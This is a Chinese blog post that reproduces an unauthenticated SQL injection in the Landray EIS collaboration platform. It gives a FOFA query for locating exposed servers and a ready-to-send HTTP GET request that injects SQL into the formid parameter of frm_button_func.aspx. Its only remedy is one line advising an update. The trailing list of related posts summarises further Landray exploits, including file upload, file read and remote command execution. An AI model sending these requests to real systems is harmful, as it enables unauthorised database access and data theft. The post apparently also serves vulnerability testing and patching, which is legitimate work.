蓝凌EIS智慧协同平台frm_button_func SQL注入漏洞复现

最新推荐文章于 2024-09-14 18:42:05 发布
最新推荐文章于 2024-09-14 18:42:05 发布
阅读量245 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: sql 数据库 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/135838155
版权
本文揭示了蓝凌EIS智慧协同平台存在的SQL注入漏洞,攻击者可借此获取敏感信息。漏洞存在于frm_button_func.aspx接口,建议用户更新至最新版本以修复。
摘要由CSDN通过智能技术生成

蓝凌EIS智慧协同平台frm_button_func SQL注入漏洞复现

1.漏洞介绍

蓝凌EIS智慧协同平台frm_button_func.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
蓝凌EIS智慧协同平台-

4.检索特征

FOFA:app=“Landray-OA系统”
在这里插入图片描述

5.POC
GET /frm/frm_button_func.aspx?formid=1%20and%201=@@version--+ HTTP/1.1
Host: url
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

6.修复建议

更新到最新版本

7.参考信息
qq_36334672
关注
专栏目录
蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现
0xSec
01-12 887
蓝凌EIS智慧协同平台frm_form_upload.aspx接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
漏洞复现蓝凌EIS智慧协同平台-frm-form-list-main-sql注入
知黑而守白
01-15 127
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台蓝凌EIS智慧协同平台 frm_form_list_main 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx 存在 SQL注入漏洞
3tefanie丶zhou的博客
01-10 509
蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
1day 蓝凌OA EIS EKP 30多个漏洞合集(含payload利用)攻防必备漏洞
weixin_43167326的博客
06-24 2269
蓝凌OA是一款全面的企业管理软件,以知识管理为核心,致力于提升组织产能。其特点在于高度自定义、易用性和灵活扩展性。通过自定义功能和流程,蓝凌OA能够满足企业的个性化需求。同时,简单的界面和操作方式使得员工能够快速上手使用。蓝凌OA还注重知识管理,提供知识模板和知识库等功能,方便员工进行知识分享和学习。此外,蓝凌OA还提供丰富的。
蓝凌OA 文件Copy导致远程代码执行漏洞
weixin_43167326的博客
07-19 527
蓝凌OA是一款高效、可靠的企业协同办公软件,提供了全面的协同办公解决方案。它具有灵活的工作流引擎,可以帮助企业实现流程自动化和信息共享,提高工作效率。蓝凌0A还拥有强大的文档管理功能,支持多人协同编辑、版本控制和权限管理,使团队成员能够更好地协同工作并共享资源。此外,蓝凌0A还具备日程管理、任务分配、邮件通知等功能,帮助用户进行任务管理和沟通协调。蓝凌0A注重用户体验,界面简洁直观,易于上手使用。总之,蓝凌0A是一款功能丰富的企业协同办公软件,能够有效提升企业的工作效率和协同能力。
蓝凌(Landray)OA漏洞常见RCE
A_991128a的博客
03-08 2000
背景是由于一次和友商共同的渗透项目测试中,其中一个系统使用了蓝凌OA,但当时由于一些原因觉得版本挺新应该是打了补丁的故在测试中没有仔细遍历复现蓝凌OA的历史常见RCE漏洞,后续对比了友商的报告发现别人测的两个RCE,故统一做个poc积累学习,混个眼熟防止下次渗透或攻防时漏掉。
蓝凌OA漏洞复现
热门推荐
混子
12-13 2万+
又是学习漏洞的一天,老是能听到蓝凌OA爆发了什么,我就很蒙蔽,想问问旁边师傅,蓝凌是个什么,又怕师傅来句你连蓝凌都不知道,怪尴尬,索性还是靠自己把,今天复现蓝凌OA
蓝凌EIS智慧协同平台 frm_button_func.aspx sql注入漏洞
m0_50797689的博客
01-23 426
蓝凌EIS智慧协同平台 frm_button_func.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。蓝凌EIS智慧协同平台集合了非常丰富的模块,满足组织企业在知识、协同、项目管理系统建设等需求。2、仅允许可信ip访问 /frm/frm_button_func.aspx 此路由。未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。路由 /frm/frm_button_func.aspx。
蓝凌EIS智慧协同平台 多处SQL注入漏洞复现
0xSec
01-12 605
​由于蓝凌EIS智慧协同平台 doc_fileedit_word.aspx、frm_form_list_main.aspx、frm_button_func.aspx、fl_define_flow_chart_show.aspx等接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌EIS智慧协同平台frm_form_upload.aspx接口存在任意文件上传漏洞
nnn2188185的博客
01-18 201
蓝凌EIS智慧协同平台frm_form_upload.aspx接口存在任意文件上传漏洞
蓝凌OA前台任意文件读取漏洞利用
08-05 1970
近期CNVD爆出漏洞编号:CNVD-2021-28277,首次公开日期为2021-04-15,蓝凌oa存在多个漏洞,攻击者可利用该漏洞获取服务器控制权。今天挑选一个蓝凌OA前台任意文件读取漏洞进行分析使用。链接:https://www.cnvd.org.cn/flaw/show/CNVD-2021-28277 蓝凌简介:蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服
漏洞复现蓝凌OA近期公开几个漏洞汇总
Adminxe的博客
07-02 5388
0x00 蓝凌OA custom.jsp 任意文件读取漏洞 1、app=”Landray-OA系统” 2、漏洞复现 出现漏洞的文件为 custom.jsp <%@page import="com.landray.kmss.util.ResourceUtil"%> <%@page import="net.sf.json.JSONArray"%> <%@page import="net.sf.json.JSONObject"%> <%@ page lang..
蓝凌OA系统任意文件读取
maverickpig的博客
05-26 3345
网络安全自学日志-漏洞复现篇:蓝凌OA系统任意文件读取&SSRF+JNDI远程命令执行组合 工作中遇到的漏洞,文章为自己复现做的相关笔记,参考了很多前人的资料,只是做个笔记。 标题一、漏洞描述 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,同时可利用ssrf进行远程命令执行。 标题二、漏洞影响 蓝凌OA 标题三、任意文件读取复现 利用 蓝凌OA custom.jsp 任意文件读取漏洞 读取配置文件 读取路径: /WEB-INF/KmssConfig/
蓝凌OA SSRF+JNDI远程命令执行
MD@@nr丫卡uer
05-13 4339
漏洞描述 深圳市蓝凌软件股份有限公司数字OA(EKP)存在任意文件读取漏洞。攻击者可利用漏洞获取敏感信息,读取配置文件得到密钥后访问 admin.do 即可利用 JNDI远程命令执行获取权限 FOFA app=“Landray-OA系统” 漏洞复现 利用蓝凌OA custom.jsp 任意文件读取漏洞读取配置文件 /WEB-INF/KmssConfig/admin.properties 发送请求包 POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host:
电脑常识蓝凌OA前台任意文件读取漏洞利用
11-16 913
电脑常识蓝凌OA前台任意文件读取漏洞利用 根据IAB E“2021年欧洲广告报告”,2021年下半年欧洲数字广告强劲复苏,全年增长6%,达到694亿欧元。刷赞平台的相关资讯可以到我们网站了解一下,从专业角度出发为您解答相关问题,给您优质的服务!教程弟 根据IAB E“2021年欧洲广告报告”,2021年下半年欧洲数字广告强劲复苏,全年增长6%,达到694亿欧元。刷赞平台的相关资讯可以到我们网站了解一下,从专业角度出发为您解答相关问题,给您优质的服务! 近期CNVD爆出漏洞编号:CNVD-202.
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 375
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
大数据-132 - Flink SQL 基本介绍 与 HelloWorld案例
永远好奇,无限进步!
09-12 2403
Flink SQL 是 Apache Flink 提供的一种高层次的查询语言接口,它基于 SQL 标准,为开发者提供了处理流式数据和批处理数据的能力。Flink SQL 允许用户使用标准 SQL 查询语言在数据流和数据表上执行复杂的操作,适用于多种应用场景,如实时分析、数据流处理、机器学习等。Flink SQL 的一大特点是流处理和批处理的统一性。通过同一套 SQL 语法,用户可以同时处理静态数据(批处理)和动态数据(流处理)。这使得应用程序的开发更加简化,因为可以用相同的逻辑编写实时流数据处理和历史数据的
经典sql题(一)求连续登录不少于三天用户
最新发布
m0_58076578的博客
09-14 820
去重提取日期查询:提取每个用户的唯一登录日期。结果表table1:显示每个用户的唯一日期。为每个用户生成序列号查询:为每个用户的日期生成序号,并计算date2。结果表table2:显示用户的日期和对应的date2。步骤使用函数,按照日期顺序为每个用户的登录日期分配一个序号。例如,对于用户 ID = 1,假设他们的日期是2023-10-012023-10-02和2023-10-03将为它们生成序号 1、2 和 3。date2是通过将每个日期减去它的序号得到的。这个操作的目的是为了检测连续的日期。
蓝凌EIS4.0:打造智慧协同工作平台
"蓝凌EIS4.0是一款智慧协同平台,旨在通过高效的知识管理和协同工作,提升企业的运营效率和员工的工作智慧。该白皮书详细介绍了EIS4.0的设计思想、技术架构、产品特点、四大核心应用、扩展功能以及贴心服务,并通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值